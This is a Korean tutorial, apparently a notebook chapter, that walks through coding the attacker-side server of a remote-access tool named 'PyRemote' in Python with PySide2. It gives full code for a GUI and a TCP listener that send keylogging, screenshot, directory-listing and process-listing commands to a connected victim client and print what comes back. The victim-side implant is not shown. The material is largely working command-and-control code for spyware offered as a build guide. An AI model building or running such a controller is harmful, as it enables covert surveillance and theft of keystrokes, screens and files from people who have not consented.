# PySide2 [[공식링크]](https://pypi.org/project/PySide2/)

공격자 프로그램은 사실 공격 명령을 내리고 클라이언트로부터 명령에 의해 수행된 결과를 받아서 표기하는 기능이 전부입니다. 프로그램의 특성상 명령 프롬프트 혹은 터미널 상태에서는 이런 결과를 보기가 불편하기 때문에 공격자 프로그램은 GUI 를 통해 인터페이스를 만들어 주도록 하겠습니다. 여기서 GUI 툴은 가장 많이 사용되는 PySide2 를 사용하도록 합니다.

> pip install pyside2

pyside2 는 pip 명령을 통해 설치가 가능합니다.

### 서버 프로그램 GUI 기본 구조

In [ ]:
from PySide2.QtWidgets import QWidget, QGridLayout, QPushButton, QApplication
from PySide2 import QtCore

class QtServer(QWidget):
    # 클라이언트 접속시 버튼을 활성화/비활성화 할 시그널
    evt_btn_control = QtCore.Signal(bool)

    def __init__(self, parent=None):
        super().__init__(parent)
        # 기본 4개의 버튼을 생성하고 버튼 클릭시 수행될 함수를 등록합니다.
        self.btn_input = self.createButton("Input", self.onBtnInput)
        self.btn_screen = self.createButton("Screen", self.onBtnScreen)
        self.btn_dir = self.createButton("Dir", self.onBtnDir)
        self.btn_process = self.createButton("Process", self.onBtnProcess)

        # Grid 레이아웃 객체 생성
        layout = QGridLayout()

        # 4개의 Grid 위치에 각각 버튼 등록
        layout.addWidget(self.btn_input, 0, 0)
        layout.addWidget(self.btn_screen, 0, 1)
        layout.addWidget(self.btn_dir, 1, 0)
        layout.addWidget(self.btn_process, 1, 1)

        # 각 버튼을 일괄적으로 활성화 비활성화 할 수 있게 시그널 함수 연결
        self.evt_btn_control.connect(self.onButtonControl)

        # 레이아웃 적용
        self.setLayout(layout)

    def createButton(self, text, function):
        '''버튼을 생성하는 함수'''
        qbutton = QPushButton(text, self)
        qbutton.setMinimumWidth(100)
        qbutton.setMinimumHeight(35)
        qbutton.setDisabled(True)
        qbutton.clicked.connect(function)
        return qbutton

    def onButtonControl(self, enabled):
        '''버튼을 enabled, disabled 할 이벤트 시그널 함수'''
        self.btn_input.setDisabled(not enabled)
        self.btn_screen.setDisabled(not enabled)
        self.btn_dir.setDisabled(not enabled)
        self.btn_process.setDisabled(not enabled)

    def onBtnInput(self):
        '''키로깅 명령 전송'''
        self.qt_input.show()
        conn_socket.send("INPUT".encode())

    def onBtnScreen(self):
        '''스크린샷 명령 전송'''
        conn_socket.send("SCREEN".encode())

    def onBtnDir(self):
        '''폴더 목록 명령 전송'''
        conn_socket.send("DIR|drive".encode())

    def onBtnProcess(self):
        '''프로세스 목록 명령 전송'''
        conn_socket.send("PROCESS".encode())

        
if __name__ == "__main__":
    app = QApplication()
    qt_server = QtServer()
    qt_server.setWindowTitle("PyRemote")
    qt_server.show()
    app.exec_()

<img style="algin:left" src="images/6.jpg" width ="400">

서버(공격자) 프로그램은 위의 이미지에서 처럼 4개의 버튼을 갖는 인터페이스로 단순하게 만들었습니다. 

### 서버 프로그램 전체 코딩

In [ ]:
import socket
import threading
from PySide2.QtWidgets import QWidget, QGridLayout, QPushButton, QApplication
from PySide2 import QtCore


# 클라이언트의 접속을 대기할 서버 소켓
server_socket = None
# 클라이언트와 접속이 성공되면 연결될 통신 소켓
conn_socket = None
# 서버 구동 포트
PORT = 5988

# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"


def get_message(conn, addr):
    '''클라이언트에서 전송되는 데이터를 받는 함수
       이 함수는 쓰레드로 동작하며 서버에서 내린 명령의 결과를 이 함수가 다 받게 됩니다.'''
    # 버퍼 사이즈는 TCP 아이피가 한번에 수신할 수 있는 크기는 정해져있으며
    # 이 값은 운영체제의 환경, 네트워크 환경마다 다르며 유동적입니다.
    BUFF_SIZE = 1024
    data = bytearray()
    while True:
        # 클라이언트로부터 BUFF_SIZE 만큼의 데이터를 수신합니다.
        packet = conn.recv(BUFF_SIZE)
        # print("데이터 받음: {}".format(packet.decode()))
        # packet 이 Not 인 경우는 클라이언트가 접속을 종료했거나 연결이 끊긴 경우 발생합니다.
        if not packet:
            print("**** DISCONNECT ****")
            break
        # 클라이언트로 부터 전송된 데이터를 bytearray 형 변수에 추가합니다.
        data.extend(packet)
        if EOF.encode() in data:
            try:
                list_data = data.split(PARSE.encode())
                data.clear()
                data_type = list_data[0]
                buffer = list_data[1]
                print("타입: {} 데이터: {}".format(data_type, buffer))
            except Exception as e:
                print(e)
    # while 문을 탈출한 경우는 클라이언트와의 접속이 끊긴경우로 판단하여
    # 현재 접속된 소켓을 닫고 다시 클라이언트의 요청을 대기 하기 위해 create_socket 함수를 호출합니다.
    conn.close()
    create_socket()


def create_socket():
    '''서버가 클라이언트의 접속을 대기하는 함수'''
    global server_socket, conn_socket

    # 서버 소켓이 None 이 아니면 기존의 소켓을 삭제 합니다.
    if server_socket is not None:
        del server_socket

    # TCP(SOCK_STREAM) 소켓을 생성하여 server_socket 변수에 저장 합니다.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 서버는 PORT 를 사용하여 동작합니다.
    server_socket.bind(("", PORT))
    # server_socket 은 접속을 대기(listen)하는 역할을 합니다.
    server_socket.listen(1)

    # 클라이언트에게서 접속 요청이 오면 accept() 가 발생되는데
    # 이때 accept 함수는 클라이언트와 연결된 새로운 소켓(conn_socket)과 클라이언트의 주소(addr)을 리턴 합니다.
    # 클라이언트와의 실제 통신은 이렇게 리턴된(conn_socket) 과 하게 됩니다.
    # !!!! server_socket 은 접속 대기용으로만 사용!!!
    conn_socket, addr = server_socket.accept()

    print("*" * 10 + " connected " + "*" * 10)

    # 클라이언트 접속 성공시 GUI 버튼을 모두 활성화 합니다.
    qt_server.evt_btn_control.emit(True)

    # 성공적으로 클라이언트와 접속이 완료되면 클라이언트에게서 데이터를 수신해야 하는데
    # 메시지 수신 함수는 무한루프로 동작하기 때문에 반드시 쓰레드로 분리해야 합니다.
    th_g = threading.Thread(target=get_message, args=(conn_socket, addr), daemon=True)
    th_g.start()


class QtServer(QWidget):
    # 클라이언트 접속시 버튼을 활성화/비활성화 할 시그널
    evt_btn_control = QtCore.Signal(bool)

    def __init__(self, parent=None):
        super().__init__(parent)
        # 기본 4개의 버튼을 생성하고 버튼 클릭시 수행될 함수를 등록합니다.
        self.btn_input = self.createButton("Input", self.onBtnInput)
        self.btn_screen = self.createButton("Screen", self.onBtnScreen)
        self.btn_dir = self.createButton("Dir", self.onBtnDir)
        self.btn_process = self.createButton("Process", self.onBtnProcess)

        # Grid 레이아웃 객체 생성
        layout = QGridLayout()

        # 4개의 Grid 위치에 각각 버튼 등록
        layout.addWidget(self.btn_input, 0, 0)
        layout.addWidget(self.btn_screen, 0, 1)
        layout.addWidget(self.btn_dir, 1, 0)
        layout.addWidget(self.btn_process, 1, 1)

        # 각 버튼을 일괄적으로 활성화 비활성화 할 수 있게 시그널 함수 연결
        self.evt_btn_control.connect(self.onButtonControl)

        # 레이아웃 적용
        self.setLayout(layout)

    def createButton(self, text, function):
        '''버튼을 생성하는 함수'''
        qbutton = QPushButton(text, self)
        qbutton.setMinimumWidth(100)
        qbutton.setMinimumHeight(35)
        qbutton.setDisabled(True)
        qbutton.clicked.connect(function)
        return qbutton

    def onButtonControl(self, enabled):
        '''버튼을 enabled, disabled 할 이벤트 시그널 함수'''
        self.btn_input.setDisabled(not enabled)
        self.btn_screen.setDisabled(not enabled)
        self.btn_dir.setDisabled(not enabled)
        self.btn_process.setDisabled(not enabled)

    def onBtnInput(self):
        '''키로깅 명령 전송'''
        conn_socket.send("INPUT".encode())

    def onBtnScreen(self):
        '''스크린샷 명령 전송'''
        conn_socket.send("SCREEN".encode())

    def onBtnDir(self):
        '''폴더 목록 명령 전송'''
        conn_socket.send("DIR|drive".encode())

    def onBtnProcess(self):
        '''프로세스 목록 명령 전송'''
        conn_socket.send("PROCESS".encode())


if __name__ == "__main__":
    app = QApplication()
    qt_server = QtServer()
    qt_server.setWindowTitle("PyRemote")
    qt_server.show()
    create_socket()
    app.exec_()

위의 기존 코드에서 ```th_g = threading.Thread(target=get_message, args=(conn_socket, addr), daemon=True)``` 부분은 꼭 ```daemon=True``` 로 설정하여 메인 쓰레드가 종료되면 메세지 수신 함수 ```get_message()``` 가 종료되도록 변경해야 하며 ```create_socket()``` 함수에 ```qt_server.evt_btn_control.emit(True)``` 가 추가 되어야 합니다.